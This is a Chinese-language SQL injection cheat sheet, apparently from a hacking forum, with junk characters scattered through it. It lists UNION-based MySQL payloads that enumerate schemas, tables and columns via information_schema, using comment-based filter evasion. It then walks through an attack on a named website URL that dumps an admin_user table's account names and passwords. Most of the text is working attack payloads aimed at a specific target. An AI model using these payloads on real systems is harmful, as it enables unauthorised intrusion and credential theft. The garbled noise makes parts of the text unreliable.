查库/ Q5 b" `# j8 Y9 U7 G
6 J, y3 h N6 \& g7 O& {id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*$ F- [) U+ f/ e
8 f @! x8 F: i8 ^( ]5 \查表+ p* p! b$ q/ F: z/ b
! P D8 T' ]. z# M& B
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1! Z0 Z) T- u0 j$ @% ^# J7 S, D. F
$ h$ y) @6 ~7 ]查段
( `4 f: W! m, f% C8 m) e# `$ }+ v4 K8 w: j) j! t5 v9 K
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1- A m" v% F$ N) }
" F* h3 E) N. k+ _+ A) e
: F( J( X6 ?+ i
mysql5高级注入方法暴表, j( H9 @' f+ x$ {; \
; E, l. N. ^2 Z8 K% t/ P: y例子如下:
}; K; V: [' W( U, I( L+ q) n8 k/ ]/ @1 j
1.爆表
/ J4 `1 m* N" g, t3 T) o$ h7 hhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
* c: l2 K( k# l# [这样爆到第4个时出现了admin_user表。5 V4 Z! ~- m7 F: D
Y8 r& k9 g5 C6 a A0 ?% @
2.暴字段9 F6 z6 x) B% I, v4 j* {; ?
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*; O6 w1 z& q0 Y( \7 C3 [5 u
) {; O& C. G% ^! V7 j& j
* p& }9 I0 y0 e% {( V
3.爆密码, l; y8 x- g& M9 b
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* ; U5 k: s8 u* F
- _) w5 A0 V+ K+ ]! X6 P
6 l( P' D4 ~$ b! L
|